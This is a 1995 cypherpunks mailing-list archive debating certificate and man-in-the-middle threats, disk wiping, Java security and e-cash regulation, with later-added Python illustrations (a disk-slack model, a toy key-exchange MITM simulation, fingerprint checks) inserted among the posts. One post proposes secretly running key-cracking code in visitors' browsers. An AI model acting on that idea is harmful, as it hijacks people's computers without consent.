>and because you're clearing Alice's credit card transaction reasonably promptly.

What if you are accessing the bank via a MITM?  Consider this example:
Alice writes you a check, signed with a key (without her name) which
has a credential from the bank saying that it will back up the check.
But you need the bank's key to check the credential, so Alice gives it
to you, or you get it from a public cache.  Suppose the bank's key is
fake, and Alice is defrauding you.  How do you tell?  Wouldn't a
certificate on the bank's key be necessary, one which ties the bank's
name and reputation to the key?

Or what if the bank really is and has always been behind a MITM?  You say
that it is more profitable for the bank not to abscond with your money.
What about the MITM?  He doesn't make any profits until he cheats.  He
might well be collecting information which will allow him at some point
to abscond very successfully.  Would you really trust a bank which was
known to you only by a key and by a record of never having defaulted,
knowing this was a possibility?

>Checks and credit cards are especially good examples for this - the current
>systems need your name on them, because your name and signature are the
>closest they have to an authentication system.  However, with digital
>signatures, the fact that you can sign a document verifiable by the public
>key is
>all the authentication that's needed; your name isn't.  If the card has an
>account number for convenience, and Alice substitutes Carol's account number
>for hers on a statement, her signature won't match the public key the bank
>wants on the request, and it'll bounce.  (In this case, the certificate
>from the bank would probably include the account number as well as the key,
>but it's not critical for on-line systems, just more efficient.)

Same problem as before: how does the credit card company know that the
key it is putting on the card is really Alice's?  What if Alice discovers
unauthorized charges because Carol was a MITM and substituted her key?
We can't just ignore this possibility.

It seems to me that a lot of protocols assume the existence of secure
channels.  Yet the MITM attack shows that public key cryptography does
not in and of itself provide a secure channel.  This is a problem which
IMO should not be ignored simply because it is inconvenient.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Tue, 10 Oct 95 06:02:00 PDT
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: PC disk wipe software - SUPERWIPE 1.04R
Message-ID: <199510101300.JAA17982@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:45 1995.10.10 -0500, Gary Jeffers wrote:
>   As for the problem of getting rid of old buffer data writes to the end
>of last file cluster writes, my program doesn't handle that. However, if
>there is no disk compressor, I don't think it would be that hard to write
>a function to handle it. In reality, I don't think that this problem is
>much of a problem anyway. It would only occur at the end of small files.

Thanks for the post.  Just a thought: there is dead space at the end of
virtually all files, not just small ones.  On average, half a cluster is
wasted at the end of any given file.  Only files that happen to be an exact
multiple of the cluster size won't have wasted bytes (on my main drive, with
a cluster size of 16K, on average about one file out of 16,000+ wouldn't
have any wasted space).

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019
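
Added illustration, not part of Herb Sutter's message or of SUPERWIPE: a small Python model of a cluster-allocated disk showing why an overwrite that stops at end-of-file leaves an earlier file's data in the last cluster's slack, and checking the half-cluster average and one-in-16,384 figures from the message. The Volume class, the file names, the PAYROLL- marker and the rule that freed clusters are reused first are assumptions of this model, not DOS internals.

```python
CLUSTER = 16 * 1024  # 16K clusters, the size quoted in the message above


def slack_bytes(size, cluster=CLUSTER):
    """Unused bytes between end-of-file and the end of the file's last cluster."""
    return (-size) % cluster


class Volume:
    """Constructed model of a cluster-allocated disk (not a FAT implementation)."""

    def __init__(self, n_clusters, cluster=CLUSTER):
        self.cluster = cluster
        self.data = bytearray(n_clusters * cluster)
        self.free = list(range(n_clusters))
        self.files = {}  # name -> (cluster chain, size in bytes)

    def write_file(self, name, content):
        """Store a non-empty file; bytes past EOF in the last cluster are not touched."""
        need = -(-len(content) // self.cluster)  # ceiling division
        chain = [self.free.pop(0) for _ in range(need)]
        for i, c in enumerate(chain):
            chunk = content[i * self.cluster:(i + 1) * self.cluster]
            self.data[c * self.cluster:c * self.cluster + len(chunk)] = chunk
        self.files[name] = (chain, len(content))

    def delete(self, name):
        """DOS-style delete: drop the directory entry, leave the data in place."""
        chain, _ = self.files.pop(name)
        self.free = chain + self.free  # model assumption: freed clusters are reused first

    def slack_of(self, name):
        """Return the bytes after end-of-file in the file's last cluster."""
        chain, size = self.files[name]
        used = size - (len(chain) - 1) * self.cluster
        start = chain[-1] * self.cluster
        return bytes(self.data[start + used:start + self.cluster])

    def wipe(self, name, cover_slack):
        """Overwrite with zeros, then delete. cover_slack=False stops at end-of-file."""
        chain, size = self.files[name]
        remaining = len(chain) * self.cluster if cover_slack else size
        for c in chain:
            n = min(self.cluster, remaining)
            self.data[c * self.cluster:c * self.cluster + n] = bytes(n)
            remaining -= n
        self.delete(name)

    def wipe_free_space(self):
        """Zero every unallocated cluster (the job the readme assigns to /OLD)."""
        for c in self.free:
            self.data[c * self.cluster:(c + 1) * self.cluster] = bytes(self.cluster)


MARK = b"PAYROLL-"  # constructed stand-in for sensitive content


def scenario(cover_slack, sweep_free=False):
    """Delete a sensitive file without wiping, reuse its cluster, then wipe the new file."""
    vol = Volume(4)
    vol.write_file("OLD.DOC", MARK * 2500)    # 20000 bytes, two clusters
    vol.delete("OLD.DOC")                     # deleted, never wiped
    vol.write_file("MEMO.TXT", b"x" * 100)    # lands on OLD.DOC's first cluster
    in_slack = MARK in vol.slack_of("MEMO.TXT")
    vol.wipe("MEMO.TXT", cover_slack)
    if sweep_free:
        vol.wipe_free_space()
    return {
        "residue_in_slack_before_wipe": in_slack,
        "residue_in_wiped_cluster": MARK in vol.data[:vol.cluster],
        "residue_anywhere": MARK in vol.data,
    }


def slack_statistics(sizes, cluster=CLUSTER):
    """Mean slack and fraction of files with none, for the given file sizes."""
    slacks = [slack_bytes(s, cluster) for s in sizes]
    return sum(slacks) / len(slacks), slacks.count(0) / len(slacks)
```

With file sizes spread evenly over every residue modulo the cluster size, slack_statistics gives a mean of just under half a cluster and a zero-slack fraction of 1/16384.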





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 10 Oct 95 09:22:07 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <199510100002.AA01774@shark.mel.dit.csiro.au>
Message-ID: <199510101620.JAA20087@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bob Smart <smart@mel.dit.csiro.au> writes:

> >  Hence the problem has no solution and we should not
> > waste much time on it.

>Exactly. If a public key ONLY has an existence in cyberspace (as per
>Pr0duct Cipher) then it is impossible to prove that they aren't
>surrounded by a MITM cloud which is also seeing everything they
>see without them knowing it.

Well, I don't think this is true.  First of all, the MITM has limited
powers.  He may be able to perform certain automated and occasionally manual
replacements on messages, but he is not able to affect communications
which take place off of the net.  In particular, he is not able to stop
Pr0duct Cipher from reading Verisign's key fingerprint in the newspaper
and comparing it with his own copy of the key.  And if PC has a valid
Verisign key then he can know that he has a valid key for other people.
If he then sends mail to those people using their keys, the MITM cannot
control that mail.  Hence PC can communicate securely with other people
even if the MITM controls all of his network communication, contrary to
the claims of impossibility.

>It is important to be aware of this. However the importance is
>perhaps mitigated by the following considerations:

>1. Surrounding someone with such an MITM cloud is so hard as to
>   be impossible for practical purposes. This will be more true
>   if the person trying to establish a cyberspace identity can
>   prove that they move around physically and use different service
>   providers at different times [but then again perhaps if you
>   do that you cease to be a purely cyberspace entity].

If only one ISP is used (which is true for the vast majority of people)
and if they only get and send keys in specific ways then I would not say
it is impossible.  Look at programs like Satan or the internet worm.
They contain many different possible attacks.  Writing such programs is
almost an exercise in tedium as much as creativity.  In the same way it
would be possible for a filter program to anticipate a dozen or more
different ways in which a user might get keys from the net, and make
substitutions.  Doing it for any given method is not that hard, so it is
just a matter of motivation to do it for 99% of the ways people will
use.

>2. If the other end of the communication is a purely cyberspace
>   entity then you can't possibly establish the sort of relationship
>   which would induce you to send them anything really secret. The
>   possibility that there might be a baddy playing MITM is 
>   infinitesimal compared to the probability that the other end
>   is itself a baddy.

Not necessarily.  As I argued before, we do establish trust relationships
in the real world.  And we do that on the basis of communication.  Yes,
in real life there are wider communication channels, nonverbal ways of
judging the sincerity of others.  But over time I would guess that online
relationships can take on the same character.  In fact, I have read
countless puff pieces about friendships, even romances, formed online.
The notion that you can't possibly establish the sort of relationships
online which would induce you to share secrets is demonstrably false, at
least for many people.

>The time you will want to deal with a cyberspace entity is where
>you are taking no risks and they are taking all the risks.
>This will hopefully be the case when we are a seller and they are
>the buyer. As long as we get the digital cash we don't care who
>they are.

That's an awfully limited way of looking at things.  We do a lot more
online than buy and sell.

>Apart from that we will always want some certificate that links the
>public key to something in the real world. The point of the
>key-centric approach is that that doesn't have to be a name or
>something that contains a name. If we want to make sure the key
>belongs to the person you were talking to last night then maybe you'd
>like some biometric data: "five foot two, eyes of blue,...". And
>of course the certificate is useless unless it is signed by a key
>that we trust for that purpose.

No, I don't think this is at all useful.  The VAST majority of people I
talk to on the net are people I have never met.  What earthly use is a
credential that key so-and-so belongs to a person with blond hair, in
helping me to establish secure communications?  Should we only talk
online to the miserable few people we live near who share our interests?
The net is global!  Virtual communities allow niche interests (like ours)
to attract people from all over the world.  Any scheme which requires
face to face meetings between every pair of participants is doomed.

Hal
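
Added illustration, not part of Hal's messages: a Python sketch of the two points made in this message and in his earlier one of 09:06, that an unauthenticated public-key exchange completes normally even when the network substitutes keys, and that comparing a fingerprint obtained off the net exposes the substitution. The toy Diffie-Hellman group, the SHA-256 fingerprint, and the class and function names are assumptions of this example.

```python
import hashlib
import secrets

# Toy Diffie-Hellman group so the example runs instantly (an assumption of
# this example; far too small for real use).
P = 2**127 - 1
G = 3


def keypair():
    """Return (private exponent, public value) in the toy group."""
    priv = secrets.randbelow(P - 3) + 2
    return priv, pow(G, priv, P)


def fingerprint(pub):
    """Short digest of a public value, suitable for printing or reading aloud."""
    return hashlib.sha256(pub.to_bytes(16, "big")).hexdigest()[:32]


def session_key(priv, peer_pub):
    """Derive a symmetric key from our private exponent and the peer's public value."""
    return hashlib.sha256(pow(peer_pub, priv, P).to_bytes(16, "big")).digest()


class HonestNetwork:
    """Delivers public values unchanged."""

    def deliver(self, pub):
        return pub


class KeySubstitutingNetwork:
    """Constructed MITM: every public value in transit is replaced by its own."""

    def __init__(self):
        self.priv, self.pub = keypair()

    def deliver(self, pub):
        return self.pub


def exchange(network):
    """Run one key exchange between two parties over the given network."""
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()

    # Out-of-band channel the network cannot rewrite (the "newspaper").
    printed = {"alice": fingerprint(a_pub), "bob": fingerprint(b_pub)}

    seen_by_bob = network.deliver(a_pub)
    seen_by_alice = network.deliver(b_pub)

    # Both sides derive a key without any error, whether or not values were swapped.
    k_alice = session_key(a_priv, seen_by_alice)
    k_bob = session_key(b_priv, seen_by_bob)

    mitm_priv = getattr(network, "priv", None)
    return {
        # Not observable by either party from the handshake alone.
        "same_key_at_both_ends": k_alice == k_bob,
        "network_holds_alices_key": (
            mitm_priv is not None and session_key(mitm_priv, a_pub) == k_alice
        ),
        # The only checks here that the parties can actually perform themselves.
        "alice_fingerprint_check": fingerprint(seen_by_alice) == printed["bob"],
        "bob_fingerprint_check": fingerprint(seen_by_bob) == printed["alice"],
    }
```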




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 10 Oct 95 09:23:40 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: netscape mail starts java attachments upon get new mail...
In-Reply-To: <9510101332.AA24407@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.951010091919.20099A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Oct 1995, Rich Salz wrote:

> 
> Oh, you mean like a mirror or local cache?  (Sure, Rocky, never happen...)

Mirroring, where the url used to access the data is not that used for the 
original, could be a problem; caches that aren't mirrors and which keep 
the original URL are ok. Whether mirroring is a problem in general is a 
different subject.

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 10 Oct 95 06:35:00 PDT
To: ses@tipper.oit.unc.edu
Subject: Re: netscape mail starts java attachments upon get new mail...
Message-ID: <9510101332.AA24407@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Java applets can't read /etc/passwd, and can't issue NIS requests unless 
> they were downloaded from an HTTP server running on the NIS server 

Oh, you mean like a mirror or local cache?  (Sure, Rocky, never happen...)

> (actually, they can't do UDP at the moment, so that's out as well)

Even with TIRPC NIS is still UDP-only?  Has NIS+ fixed this?
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 10 Oct 95 09:39:02 PDT
To: cypherpunks@toad.com
Subject: Re: Chaum's patents
In-Reply-To: <Pine.3.89.9510091650.A96856-0100000@aix2.uottawa.ca>
Message-ID: <199510101637.JAA22634@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


s1018954@aix2.uottawa.ca writes:

>Sorry if this has been stated before, but exactly when do Chaum's first
>set up e-cash related patents expire? I looked it up in applied crypto
>the last time I had my hands on it and couldn't find the dates. 

>How many (and what) patents are there in this field anyway? (don't bother 
>with that if it's too long to answer)

I did a patent search a few months ago, with results at <URL:
http://www.portal.com/~hfinney/chaum_patents.html>.  Chaum has several
patents; my list doesn't have all of them.  The ones I have are dated
1988 and 1990.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 10 Oct 95 09:39:04 PDT
To: cypherpunks@toad.com
Subject: Re: java security concerns
Message-ID: <v02120d03aca05dde70fb@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero wrote:
>In my previous message, I left out some fundamental parts of the run-time
>that need to be looked at carefully. The garbage collection needs to be
>examined carefully. Normally GC algorithms are formally derived, so it's
>the implementation that needs to be checked for. holes in the GC may be
>too unpredictable to exploit for anything but core-dumping, especially since
>java uses a mark-sweep conservative collector.
>

FWIW, we had some ideas about how to attack the GC from untrusted code,
involving resurrection of objects during finalization. This turned out
not to work -- the Javoids apparently anticipated this problem in their
design.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 10 Oct 95 06:46:03 PDT
To: cypherpunks@toad.com
Subject: Re: java security & the cypherpunk agenda
Message-ID: <9510101342.AA24492@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


From what I have seen of the CV's of the Java team (at least those
who have/had home pages on the various Sun java servers), none of
them were particularly security-aware.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 10 Oct 95 07:52:27 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Certificate proposal
In-Reply-To: <199510100002.AA01774@shark.mel.dit.csiro.au>
Message-ID: <9510101450.AA28558@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
 > 	If a MITM attack would be useful, then there will be times
 > when one will be mounted.  It might take 30 law enforcement officers
 > to do it, but it has been demonstrated that the FBI will use that many
 > people for a year or more on some cases.  The CIA and NSA can be
 > presumed to be willing to spend more time and effort to get certain
 > results.

Right; if there's that much energy being expended, then I have no
reason to trust that just because the Department of Keys tells me that
a particular key belongs to one "Alice B. Crypto" it's really the same
Alice I think I know.  I'll make sure that we verify our keys in
person.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Tue, 10 Oct 95 06:59:31 PDT
To: cypherpunks@toad.com
Subject: Java idea
Message-ID: <9510101354.AA05988@outland>
MIME-Version: 1.0
Content-Type: text/plain



Well, security bugs aside (and I've got the sun4.1.3_u1 and Win32 ns2b
distributions :) has anyone given any thought to using Java to do some
sort of Chinese Lottery attack.  I was re-reading App. Crypto. last
night and it could be feasible.  If you could get your key cruncher
thread loaded into a good many browsers to run when idle . . . .  How
many estimated copies of NS are there?  Anyone want to do the math? :)

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)	     Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Smart <smart@mel.dit.csiro.au>
Date: Mon, 9 Oct 95 17:02:51 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510092316.QAA09588@jobe.shell.portal.com>
Message-ID: <199510100002.AA01774@shark.mel.dit.csiro.au>
MIME-Version: 1.0
Content-Type: text/plain


 >  Hence the problem has no solution and we should not
 > waste much time on it.

Exactly. If a public key ONLY has an existence in cyberspace (as per
Pr0duct Cipher) then it is impossible to prove that they aren't
surrounded by a MITM cloud which is also seeing everything they
see without them knowing it.

It is important to be aware of this. However the importance is
perhaps mitigated by the following considerations:

1. Surrounding someone with such an MITM cloud is so hard as to
   be impossible for practical purposes. This will be more true
   if the person trying to establish a cyberspace identity can
   prove that they move around physically and use different service
   providers at different times [but then again perhaps if you
   do that you cease to be a purely cyberspace entity].

2. If the other end of the communication is a purely cyberspace
   entity then you can't possibly establish the sort of relationship
   which would induce you to send them anything really secret. The
   possibility that there might be a baddy playing MITM is 
   infinitesimal compared to the probability that the other end
   is itself a baddy.

The time you will want to deal with a cyberspace entity is where
you are taking no risks and they are taking all the risks.
This will hopefully be the case when we are a seller and they are
the buyer. As long as we get the digital cash we don't care who
they are.

Apart from that we will always want some certificate that links the
public key to something in the real world. The point of the
key-centric approach is that that doesn't have to be a name or
something that contains a name. If we want to make sure the key
belongs to the person you were talking to last night then maybe you'd
like some biometric data: "five foot two, eyes of blue,...". And
of course the certificate is useless unless it is signed by a key
that we trust for that purpose.

Bob Smart

P.S. I hope my earlier postings were not interpreted as being critical
of the IPSEC effort. I strongly support it. It would be silly to
go to them and say "hold everything I think we need a whole new
security architecture". That is something for the future that we
are only just starting to think about. However I think the IPSEC
work confirms the difficulties of the current "name first then
key" approach. Whenever it is incorporated in any protocol from
network layer to application it makes the protocol at least twice
as complex and at least twice as hard to manage.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Tue, 10 Oct 95 07:45:25 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <199510101408.AA00668@october.ducktown.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> > We mustn't forget that, until very recently, strong, widespread
> > privacy has been humanity's "default" condition.
> 
> Not much privacy in village or tribal life.  Even neighborhoods of 
> earlier cities weren't very private.  Neighbors always knew your business.

The point is, strong privacy is readily AVAILABLE even under those
circumstances.  If tribal elders tried to prohibit people from
wandering out of earshot, then you'd have an analogy.

					---  mkj

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Oct 95 07:12:28 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Conference Summary, Part the First
Message-ID: <199510101411.KAA01820@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:23 PM 10/8/95 -0800, Douglas Barnes wrote:

>  o Regulators are not amused by attempts to run unlicensed online
>    banks. They are aware such things are starting to pop up, and
>    they are very interested in shutting them down when they do.

The jurisdictional problems are going to be very interesting.  As with
gambling.  Nations are reluctant to extradite their nationals for acts that
are not crimes at home.  The US follows this practice just like everyone
else.  Witness the lack of success of the German government in extraditing
neo-nazis from the US.  They had to grab one in Europe.

>  o The same goes for NBFIs (Non-bank financial institutions) --
>    these appear to be regulated primarily at the state level, with
>    some IRS and FinCEN involvement. These include everyone from
>    stock brokers to Casas de Cambio.

This is the real problem for the Feds.  When everyone is a non-bank
financial institution...

>  o The attendees displayed an understanding of the situation wrt
>    electronic payment systems that ran from dim to non-existent. 

Hard to control what you don't know.

>  o Fewer formal, specific or deterministic rules for reporting
>    suspicious transactions.
>
>  o More vague, subjective, and privacy-invading rules for
>    reporting suspicious transactions, coupled with more severe
>    penalties for banks and NBFIs.

But unlicensed NBFIs don't have licenses to pull so regulation is tricky.
An unlicensed NBFI includes any institution in another jurisdiction (no *US*
license) and any person running Quicken version 9.0 that will no doubt
support exotic electronic payment systems.

>  o Banks are now considered "deputies" of the federal government
>    in the War On Money Laundering.

Generals are always fighting the last war.  Banks are history particularly
if they are unable to offer competitive services because of regulatory
restrictions.

>  o Banks must implement strict "Know Your Customer" policies.

Which are trivial to defeat particularly under an EPS system when the
customer hands his keys over to his actual principal.

Note:  I've often wondered why the rulers place so much faith in their
ability to identify people when those who have studied the Is A Person
problem have thrown their hands up.

"Homeless?  Want to make a few bucks?  You have a brilliant future in the
identity sales business.  Remember, you can sell your identity as many times
as you like.  It never wears out."

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 10 Oct 95 07:12:39 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Distributed co-operative theorem proving, anyone? - was Java
In-Reply-To: <9510100110.AA25989@all.net>
Message-ID: <199510101415.KAA03219@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dr. Frederick B. Cohen wrote:

| > For the general case this is true. To be able to trust larger systems, you
| > need to not only be able to trust the individual 2 pagers, but to also be
| > able to show that composing the sub units doesn't lose whatever property
| > you're trying to do.
| ...
| > Distributed co-operative theorem proving, anyone?
| 
| Let's go - I will provide the distribution mechanisms, and I think I
| know someone who is interested in the theorem proof side.  I know of
| several experts on theorem proving who may well pitch in.  What program
| do you want to prove secure next (we're currently finishing up my secure
| Web server).

	I'd be real interested in seeing an MTA proven secure.  Smail
or Zmailer perhaps?

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 9 Oct 95 19:00:06 PDT
To: perry@piermont.com
Subject: Re: PC disk wipe software
In-Reply-To: <199510091318.JAA24166@jekyll.piermont.com>
Message-ID: <199510092317.AA44641@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>I thought I'd ask here, since it's related to a lot of the stuff people
>have written for the PC platform in these parts. I need to securely
>wipe a bunch of data from an MS-DOS hard drive, so that it can't be
>recovered. Are there any readily available utilities for this? Will
>any of them selectively erase only data that isn't allocated to
>existing files?

Archive data off to tape, low level format drive using the bios hd utils,
reformat drive, restore data. I find the non graphical AMI bios very useful
for this.

Doing anything else fails to remove the old data on partially used but valid
blocks.

Cheers,
Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 10 Oct 95 07:20:09 PDT
To: smart@mel.dit.csiro.au (Bob Smart)
Subject: Re: Certificate proposal
In-Reply-To: <199510100002.AA01774@shark.mel.dit.csiro.au>
Message-ID: <199510101422.KAA03235@homeport.org>
MIME-Version: 1.0
Content-Type: text



	"Never underestimate the effort your opponent will expend on
cryptanalysis."  -- Robert Morris, Sr., speaking at Crypto '95

	If a MITM attack would be useful, then there will be times
when one will be mounted.  It might take 30 law enforcement officers
to do it, but it has been demonstrated that the FBI will use that many
people for a year or more on some cases.  The CIA and NSA can be
presumed to be willing to spend more time and effort to get certain
results.

Bob Smart wrote:

| Exactly. If a public key ONLY has an existence in cyberspace (as per
| Pr0duct Cipher) then it is impossible to prove that they aren't
| surrounded by a MITM cloud which is also seeing everything they
| see without them knowing it.
| 
| It is important to be aware of this. However the importance is
| perhaps mitigated by the following considerations:
| 
| 1. Surrounding someone with such an MITM cloud is so hard as to
|    be impossible for practical purposes. This will be more true
|    if the person trying to establish a cyberspace identity can
|    prove that they move around physically and use different service
|    providers at different times [but then again perhaps if you

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 10 Oct 95 07:29:30 PDT
To: gmiller@grendel.ius.indiana.edu (Greg Miller)
Subject: Re: Java
In-Reply-To: <Pine.3.89.9510091807.A8324-0100000@grendel.ius.indiana.edu>
Message-ID: <199510101432.KAA03416@homeport.org>
MIME-Version: 1.0
Content-Type: text



| 	I'd like to make this prediction:  someone at some point in time 
| will find another serious security hole in SendMail.
| 
| 	What you need to ask yourself is "Do the benefits of Java 
| outweigh the security risks?"

	A substantial risk that Java carries is that its 'secure'
label will get in through doors which should have remained closed to
it.  I would be worried about Java capable browsers in the Federal
Reserve, because people will say 'it's nifty, it's labeled secure, let's
use it.'

	I think there are some interesting liability models waiting to
be explored here.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sjb@universe.digex.net (Scott Brickner)
Date: Tue, 10 Oct 95 08:33:35 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Certificate proposal
In-Reply-To: <9510101243.AA28296@alpha>
Message-ID: <9510101532.AA17835@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes
>
>Scott Brickner writes:
> > I disagree.  The MITM is foiled by one successful communication. 
>
>I'm going to need some clarification of this; what is meant by
>"successful"?  If you mean "a communication without a MITM
>participating", and presuming also that that communication would
>involve a key validation, then I suppose it's true.  However, I don't
>see how this success can be evaluated if the parties do not have
>nearly complete control over the communications substrate.

By "successful" I mean communicating without the MITM *interfering*.
Either the parties need to exchange a symmetric key without the MITM
eavesdropping, or exchange asymmetric keys without the MITM modifying
them.

The chance of failure is minimized by diversity in the channels used to
try to bypass the MITM.  The issue becomes one of risk management.  If
you can't afford a failure, you *do* need a channel over which you have
nearly complete control.  The simplest such channel is a physical
meeting, during which you exchange public keys.  If the MITM threat is
from your ISP, you are likely to bypass his control with the telephone
network.  Any single success is adequate.
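The out-of-band check discussed in the message above, as an added example that is not part of the original post. The public keys are random stand-in bytes, and the `Channel` model, the channel names and `check_key` are assumptions made for illustration: an interfering channel substitutes its own key and rewrites any fingerprint it carries, so only a channel it does not control can expose the swap.

```python
import hashlib
import hmac
import secrets


def fingerprint(pubkey: bytes) -> str:
    """Digest short enough to read over a phone or compare at a meeting."""
    h = hashlib.sha256(pubkey).hexdigest()[:32]
    return " ".join(h[i:i + 4] for i in range(0, len(h), 4))


class Channel:
    """One path between the two parties (constructed model).

    An interfering channel swaps in the attacker's key and also rewrites
    any fingerprint it carries, so that its own story stays consistent.
    """

    def __init__(self, name, attacker_key=None):
        self.name = name
        self.attacker_key = attacker_key

    def carry_key(self, key: bytes) -> bytes:
        return key if self.attacker_key is None else self.attacker_key

    def carry_fingerprint(self, fp: str) -> str:
        if self.attacker_key is None:
            return fp
        return fingerprint(self.attacker_key)


def check_key(sender_key, key_channel, verify_channels):
    """Receive a key over key_channel, then confirm it over other channels.

    Returns (received_key, names_of_disagreeing_channels). A non-empty
    list means at least one channel bypassed the interference, and the
    received key must be rejected.
    """
    received = key_channel.carry_key(sender_key)
    local_fp = fingerprint(received)
    disagree = []
    for ch in verify_channels:
        reported = ch.carry_fingerprint(fingerprint(sender_key))
        if not hmac.compare_digest(local_fp, reported):
            disagree.append(ch.name)
    return received, disagree


def scenarios():
    """Run three constructed cases; map name -> (got_real_key, disagreeing)."""
    alice_key = secrets.token_bytes(64)    # constructed stand-in public key
    mallory_key = secrets.token_bytes(64)  # constructed stand-in MITM key

    clean_net = Channel("clean-network")
    isp = Channel("isp", attacker_key=mallory_key)
    second_isp = Channel("second-isp", attacker_key=mallory_key)
    phone = Channel("telephone")
    meeting = Channel("in-person")

    cases = {
        # Nobody interferes: every confirmation agrees.
        "no interference": (clean_net, [phone]),
        # The ISP interferes; one uncontrolled channel is enough to see it.
        "isp mitm, diverse checks": (isp, [second_isp, phone, meeting]),
        # Every channel is controlled: the substitution goes unnoticed.
        "all channels controlled": (isp, [second_isp]),
    }
    results = {}
    for name, (key_channel, verify_channels) in cases.items():
        received, disagree = check_key(alice_key, key_channel, verify_channels)
        results[name] = (received == alice_key, disagree)
    return results


if __name__ == "__main__":
    for name, (ok, disagree) in scenarios().items():
        verdict = "REJECT" if disagree else "accept"
        print(f"{name}: real key={ok} disagreeing={disagree} -> {verdict}")
```

The third case is the residual risk: when every confirmation channel is under the same control, the check passes on a substituted key, which is why the diversity of channels matters.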




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Tue, 10 Oct 95 07:43:40 PDT
To: cypherpunks@toad.com
Subject: Re: Basic Flaws in Internet Security and Commerce
Message-ID: <9510101442.AA11568@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


A fine piece of work.  The ideas expressed in this paper should scare
the hell out of everyone who uses NFS for any serious applications,
which for a fact includes most banks and all investment banks and
brokerage houses.  In this particular area I KNOW what is at risk.
Again, I congratulate the authors on a first-class effort.
 
cheers,
    paul

> From owner-cypherpunks@toad.com Tue Oct 10 03:15:15 1995
